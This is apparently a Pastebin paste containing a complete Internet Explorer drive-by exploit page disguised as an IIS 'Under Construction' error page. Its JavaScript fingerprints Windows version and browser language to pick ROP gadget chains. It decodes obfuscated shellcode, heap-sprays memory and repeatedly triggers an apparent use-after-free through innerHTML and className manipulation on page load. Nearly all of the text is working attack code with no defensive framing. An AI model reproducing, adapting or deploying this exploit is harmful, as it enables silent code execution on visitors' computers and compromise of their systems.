Advertisement
Guest User

Untitled

a guest
Jun 13th, 2012
2,231
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.09 KB | None | 0 0
  1. Hax0rFunT1me !!
  2.  
  3.  
  4. <HTML>
  5. <head>
  6. <meta HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
  7.  
  8.  
  9. <title ID=titletext>Under Construction</title>
  10. </head>
  11. <SCRIPT LANGUAGE="JavaScript">
  12.  
  13. function FINGERPRINT_IE()
  14. {
  15. this.UNKNOWN = -1;
  16. this.WINDOWS_XP = 1;
  17. this.WINDOWS_2003 = 2;
  18. this.WINDOWS_VISTA = 3;
  19. this.WINDOWS_7 = 4;
  20.  
  21. this.EN=5;
  22. this.ZH=6;
  23. this.FR=7;
  24. this.DE=8;
  25. this.JA=9;
  26. this.PT=10;
  27. this.KO=11;
  28. this.RU=12;
  29.  
  30. this.isie = function()
  31. {
  32. if( navigator.appName != 'Microsoft Internet Explorer' || navigator.userAgent.indexOf( 'MSIE' ) < 0 )
  33. return false;
  34. return true;
  35. };
  36.  
  37. this.platform = function()
  38. {
  39. if( navigator.userAgent.indexOf( 'Windows NT 5.1' ) > -1 )
  40. return this.WINDOWS_XP;
  41. else if( navigator.userAgent.indexOf( 'Windows NT 5.2' ) > -1 )
  42. return this.WINDOWS_2003;
  43. else if( navigator.userAgent.indexOf( 'Windows NT 6.0' ) > -1 )
  44. return this.WINDOWS_VISTA;
  45. else if( navigator.userAgent.indexOf( 'Windows NT 6.1' ) > -1 )
  46. return this.WINDOWS_7;
  47. return this.UNKNOWN;
  48. };
  49.  
  50. this.tarLanguage=function()
  51. {
  52. var language;
  53. if(navigator.appName=='Netscape')
  54. language=navigator.language;
  55. else
  56. language=navigator.browserLanguage;
  57.  
  58. if(language.indexOf('en')>-1)
  59. return this.EN;
  60. else if(language.indexOf('zh')>-1)
  61. return this.ZH;
  62. else if (language.indexOf('fr') > -1)
  63. return this.FR;
  64. else if (language.indexOf('de') > -1)
  65. return this.DE;
  66. else if (language.indexOf('ja') > -1)
  67. return this.JA;
  68. else if (language.indexOf('pt') > -1)
  69. return this.PT;
  70. else if(language.indexOf('ko') > -1)
  71. return this.KO;
  72. else if(language.indexOf('ru') > -1)
  73. return this.RU;
  74. else
  75. return alert(language);
  76.  
  77. };
  78. }
  79.  
  80. function dup_str(str, length) {
  81. var res = str;
  82. while(res.length < length) {
  83. res += res;
  84. }
  85. res = res.substr(res.length - length);
  86. return res;
  87. }
  88.  
  89. function to_bin(str) {
  90. var res = "";
  91. while(str.length > 0) {
  92. var first = str.substr(0, 2);
  93. var second = str.substr(2, 2);
  94. res += "%u" + second + first;
  95. str = (str.length > 4) ? str.substr(4) : "";
  96. }
  97. return unescape(res);
  98. }
  99. var arr=[];
  100. function ManAndWoman()
  101. {
  102. var ie=new FINGERPRINT_IE();
  103. var platform = ie.platform();
  104. var tarLanguage=ie.tarLanguage();
  105.  
  106. var adjustEsp= dword2data(0x645b186a)+
  107. dword2data(0x638b1b8b)+
  108. dword2data(0x9090fc08);
  109.  
  110. var vbc =("NewYoukv10EBNewYoukv4B5BNewYoukvC933NewYoukvB966NewYoukv0171NewYoukv3480NewYoukv110BNewYoukvFAE2NewYoukv05EBNewYoukvEBE8NewYoukvFFFFNewYoukvF8FFNewYoukv1013NewYoukv1111NewYoukv754E"+
  111. "NewYoukv21B0NewYoukv1111NewYoukv9A11NewYoukv1D51NewYoukv619ANewYoukvBC0DNewYoukv799ANewYoukv9A19NewYoukv7BE6NewYoukv4817NewYoukvB3F9NewYoukv1111NewYoukvF311NewYoukv51E8NewYoukv2991"+
  112. "NewYoukv64D2NewYoukv98EBNewYoukv0D57NewYoukv7E79NewYoukv117FNewYoukv7911NewYoukv6364NewYoukv7C7DNewYoukvCD9ANewYoukv01FANewYoukvEE42NewYoukv0D67NewYoukvEE9ANewYoukv9A44NewYoukv9AFD"+
  113. "NewYoukv9C07NewYoukv1443NewYoukvF3EENewYoukvFAF9NewYoukvEEEENewYoukv4BEENewYoukv444BNewYoukvF99ANewYoukv7BF9NewYoukv1111NewYoukv4C11NewYoukvFD90NewYoukv1011NewYoukv1111NewYoukvCD9A"+
  114. "NewYoukv7942NewYoukv1011NewYoukv1111NewYoukv47EENewYoukv9815NewYoukv314FNewYoukv15D6NewYoukv7D12NewYoukv767ENewYoukvD63FNewYoukv1255NewYoukv7615NewYoukv7778NewYoukv2211NewYoukv41D1"+
  115. "NewYoukv4241NewYoukvC79ANewYoukvD392NewYoukv4339NewYoukvEE41NewYoukv0947NewYoukvD122NewYoukv05FANewYoukvEE41NewYoukv3167NewYoukv67EENewYoukv9A0DNewYoukv44EENewYoukvFD9ANewYoukv479A"+
  116. "NewYoukv9C19NewYoukv1443NewYoukvF3EENewYoukvF6F9NewYoukvEEEENewYoukv79EENewYoukv12F9NewYoukv1111NewYoukv47EENewYoukvEE01NewYoukv3167NewYoukv47EENewYoukv901DNewYoukv15D5NewYoukv1113"+
  117. "NewYoukv2211NewYoukv40D8NewYoukv47EENewYoukv4005NewYoukv9A47NewYoukv2D64NewYoukv659ANewYoukv693FNewYoukvE412NewYoukv9A47NewYoukv3167NewYoukvE412NewYoukvD822NewYoukv5058NewYoukv12BC"+
  118. "NewYoukv22D4NewYoukv1ECANewYoukv01AFNewYoukvC72BNewYoukv1965NewYoukvDAD0NewYoukv121CNewYoukv51CBNewYoukvE0FANewYoukv0E2ANewYoukvF664NewYoukv9A4FNewYoukv354FNewYoukvCC12NewYoukv9A77"+
  119. "NewYoukv5A1DNewYoukv4F9ANewYoukv120DNewYoukv9ACCNewYoukv9A15NewYoukvD412NewYoukv4FBANewYoukvD248NewYoukvE8F9NewYoukvEEEFNewYoukv9FEENewYoukv1F5FNewYoukv22FDNewYoukv9BDBNewYoukv894A"+
  120. "NewYoukv9BEFNewYoukv341FNewYoukvEEA1NewYoukvA1D3NewYoukv3C58NewYoukv6FCANewYoukvF3C9NewYoukv2762NewYoukv3E0BNewYoukv2061NewYoukv2223NewYoukv2425NewYoukv2627NewYoukv2829NewYoukv1121NewYoukv7911NewYoukv6565NewYoukv2B61NewYoukv3E3ENewYoukv2020NewYoukv3F22NewYoukv2120NewYoukv233FNewYoukv2025NewYoukv233FNewYoukv2822NewYoukv7B3ENewYoukv6770NewYoukv6670NewYoukv743FNewYoukv7469NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111");
  121.  
  122. var xbc=vbc.replace(/NewYoukv/g,"%u");
  123.  
  124. var gjb=unescape(xbc);
  125.  
  126. var rop_stack="";
  127.  
  128.  
  129. if( platform == ie.WINDOWS_7 || platform == ie.WINDOWS_VISTA)
  130. {
  131. rop_stack= dword2data(0x7c34bc93)+
  132. dword2data(0x7c34bc93)+
  133. dword2data(0x7c343860)+
  134. dword2data(0x00000001)+
  135. dword2data(0x7c344efe)+
  136. dword2data(0x00001000)+
  137. dword2data(0x7c35f1fb)+
  138. dword2data(0x00000040)+
  139. dword2data(0x7c341137)+
  140. dword2data(0x7c346c0b)+
  141. dword2data(0x7c36277b)+
  142. dword2data(0x7c3415a2)+
  143. dword2data(0x7c373b3d)+
  144.  
  145. dword2data(0x7c37a0a5)+
  146. dword2data(0x7c378c81)+
  147. dword2data(0x7c345c30);
  148.  
  149. while(rop_stack.length < (0x6c/2))
  150. {
  151. rop_stack+=dword2data(0x90909090);
  152. }
  153. rop_stack+=dword2data(0x04eb9090);
  154. rop_stack+=dword2data(0x7c348b05);
  155.  
  156. }
  157. else if( platform == ie.WINDOWS_XP )
  158. {
  159. var dllBase;//iertutil.dll
  160.  
  161. var insOff=0xFD5A8;
  162. var insOff2=0xBA108;
  163.  
  164. var kernelBase=0x7c800000;//kernel32.dll
  165.  
  166. var kerOff1=0x7BF37;
  167. var kerOff2=0x9AF1;
  168. var kerOff3=0xE034;
  169. var kerOff4=0x7F436;
  170. var kerOff5=0x36A08;
  171. var kerOff6=0x6CFC3;
  172. var kerOff7=0x1BC81;
  173.  
  174. if(tarLanguage == ie.EN)
  175. {
  176. dllBase=0x3dfd0000;
  177. }
  178. else if(tarLanguage == ie.ZH)
  179. {
  180. dllBase=0x3eab0000;
  181. }
  182. else if(tarLanguage == ie.JA)
  183. {
  184. dllBase=0x40930000;
  185. }
  186. else if(tarLanguage == ie.KO)
  187. {
  188. dllBase=0x3f8d0000;
  189. kernelBase=0x7c7d0000;
  190. }
  191. else if(tarLanguage == ie.DE)
  192. {
  193. dllBase=0x40f50000;
  194. }
  195. else if(tarLanguage == ie.FR)
  196. {
  197. dllBase=0x40b40000;
  198. }
  199. else if(tarLanguage == ie.RU)
  200. {
  201. dllBase=0x40080000;
  202. }
  203. else if(tarLanguage == ie.PT)
  204. {
  205. dllBase=0x400f0000;
  206. }
  207. rop_stack= dword2data(kernelBase+kerOff1)+
  208. dword2data(kernelBase+kerOff2)+
  209. dword2data(kernelBase+kerOff3)+
  210. dword2data(0x00000040)+
  211. dword2data(0x00000001)+
  212. dword2data(kernelBase+kerOff4)+
  213. dword2data(0x41414141)+
  214.  
  215. dword2data(0x00001000)+
  216. dword2data(0x90909090)+
  217. dword2data(kernelBase+kerOff5)+
  218. dword2data(kernelBase+kerOff6)+
  219. dword2data(kernelBase+kerOff7)+
  220. dword2data(dllBase+insOff);
  221.  
  222.  
  223. while(rop_stack.length < (0x6c/2))
  224. {
  225. rop_stack+=dword2data(0x90909090);
  226. }
  227. rop_stack+=dword2data(0x04eb9090);
  228. rop_stack+=dword2data(dllBase+insOff2);
  229. }
  230.  
  231. rop_stack+=adjustEsp;
  232. rop_stack+=gjb;
  233. var memory_layout= dword2data(0xDEADBEE1)+
  234. dword2data(0xDEADBEE2)+
  235. dword2data(0xDEADBEE3)+
  236. dword2data(0xDEADBEE4)+
  237. dword2data(0xDEADBEE5)+
  238. dword2data(0xDEADBEE6)+
  239. dword2data(0xDEADBEE7)+
  240. dword2data(0xDEADBEE8)+
  241. dword2data(0xDEADBEE9);
  242.  
  243. var code=rop_stack;
  244. var nops=unescape('%u9'+'090'+'%u9'+'090');
  245. while(nops.length < 0x80000)
  246. {
  247. nops+=nops;
  248. }
  249. var offset=nops.substring(0,0x5f4-memory_layout.length);
  250. var blockItem=memory_layout+offset+code+nops.substring(0,0x800-0x5f4-code.length);
  251. while(blockItem.length < 0x40000)
  252. {
  253. blockItem+=blockItem;
  254. }
  255. var block_shell=blockItem.substring(0,(0x80000-6)/2);
  256.  
  257.  
  258. for(var i=1;i<0x1c2;++i)
  259. {
  260. arr[i]=block_shell.substring(0,block_shell.length);
  261. }
  262. }
  263.  
  264.  
  265. </SCRIPT>
  266. <BODY>
  267.  
  268.  
  269. <DIV id=testfaild>
  270. <img id="imgTest" style="display:none">
  271. <a href="javascript:OnTest();" id="MyA" onClick="OnTest();">
  272. <div style="background-color:#FFFFFF; width:3000; height:4000" id="imgTest" src="" onMouseOver="OnTest2();" onMouseOut="OnTest2();"> </div>
  273. </a>
  274. </DIV>
  275. <SCRIPT LANGUAGE="JavaScript">
  276.  
  277. function dword2data( dword )
  278. {
  279. var d = Number( dword ).toString( 16 );
  280. while( d.length < 8 )
  281. d = '0' + d;
  282. return unescape( '%u' + d.substr( 4, 8 ) + '%u' + d.substr( 0, 4 ) );
  283. }
  284.  
  285. function OnTest()
  286. {
  287. var tag=0x0c0c0c0c;
  288. var vtable1 = dword2data( tag ) + '1234567555555555588888888';
  289.  
  290. var divs = new Array();
  291. for( var i=0 ; i<128; i++ )
  292. divs.push( document.createElement( 'div' ) );
  293. Math.atan2(0xbabe,"trigger before!!!");
  294. testfaild.innerHTML = testfaild.innerHTML;
  295. Math.atan2(0xbabe,"trigger before 222!!!");
  296.  
  297. divs[0].className = vtable1;
  298. divs[1].className = vtable1;
  299. divs[2].className = vtable1;
  300. divs[3].className = vtable1;
  301. }
  302.  
  303. function OnTest2()
  304. {
  305. eval("imgTest").src="";
  306. }
  307.  
  308. function triggerFunc()
  309. {
  310.  
  311. var x=document.getElementsByTagName("div");
  312.  
  313. var fireOnThis=document.getElementById("MyA");
  314. if(document.createEvent)
  315. {
  316.  
  317.  
  318.  
  319. evObj=document.createEvent('MouseEvents');
  320. evObj.iniEvent('click',true,false);
  321. fireOnThis.dispatchEvent(evObj);
  322.  
  323. }
  324. else if(document.createEventObject)
  325. {
  326. x[1].fireEvent('onMouseOver');
  327.  
  328. fireOnThis.fireEvent('onclick');
  329.  
  330. x[1].fireEvent('onMouseOut');
  331. }
  332.  
  333. setTimeout("triggerFunc();",1000);
  334. }
  335. setTimeout("triggerFunc();",1000);
  336. ManAndWoman();
  337.  
  338. </SCRIPT>
  339.  
  340.  
  341.  
  342.  
  343. <body bgcolor=white>
  344. <table>
  345. <tr>
  346. <td ID=tableProps width=70 valign=top align=center>
  347. <img ID=pagerrorImg src="pagerror.gif" width=36 height=48>
  348. <td ID=tablePropsWidth width=400>
  349.  
  350. <h1 ID=errortype style="font:14pt/16pt verdana; color:#4e4e4e">
  351. <P ID=Comment1><!--Problem--><P ID="errorText">Under Construction</h1>
  352.  
  353. <P ID=Comment2><!--Probable causes:<--><P ID="errordesc"><font style="font:9pt/12pt verdana; color:black">
  354. The site you are trying to view does not currently have a default page. It may be in the process of being upgraded and configured.
  355. <P ID=term1>Please try this site again later. If you still experience the problem, try contacting the Web site administrator.
  356.  
  357. <hr size=1 color="blue">
  358.  
  359. <P ID=message1>If you are the Web site administrator and feel you have received this message in error, please see &quot;Enabling and Disabling Dynamic Content&quot; in IIS Help.
  360.  
  361. <h5 ID=head1>To access IIS Help</h5>
  362. <ol>
  363. <li ID=bullet1>Click <b>Start</b>, and then click <b>Run</b>.
  364. <li ID=bullet2>In the <b>Open</b> text box, type <b>inetmgr</b>. IIS Manager appears.
  365. <li ID=bullet3>From the <b>Help</b> menu, click <b>Help Topics</b>.
  366. <li ID=bullet4>Click <b>Internet Information Services</b>.</ol>
  367. </td>
  368. </tr>
  369. </table>
  370.  
  371.  
  372. </BODY>
  373. </HTML>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement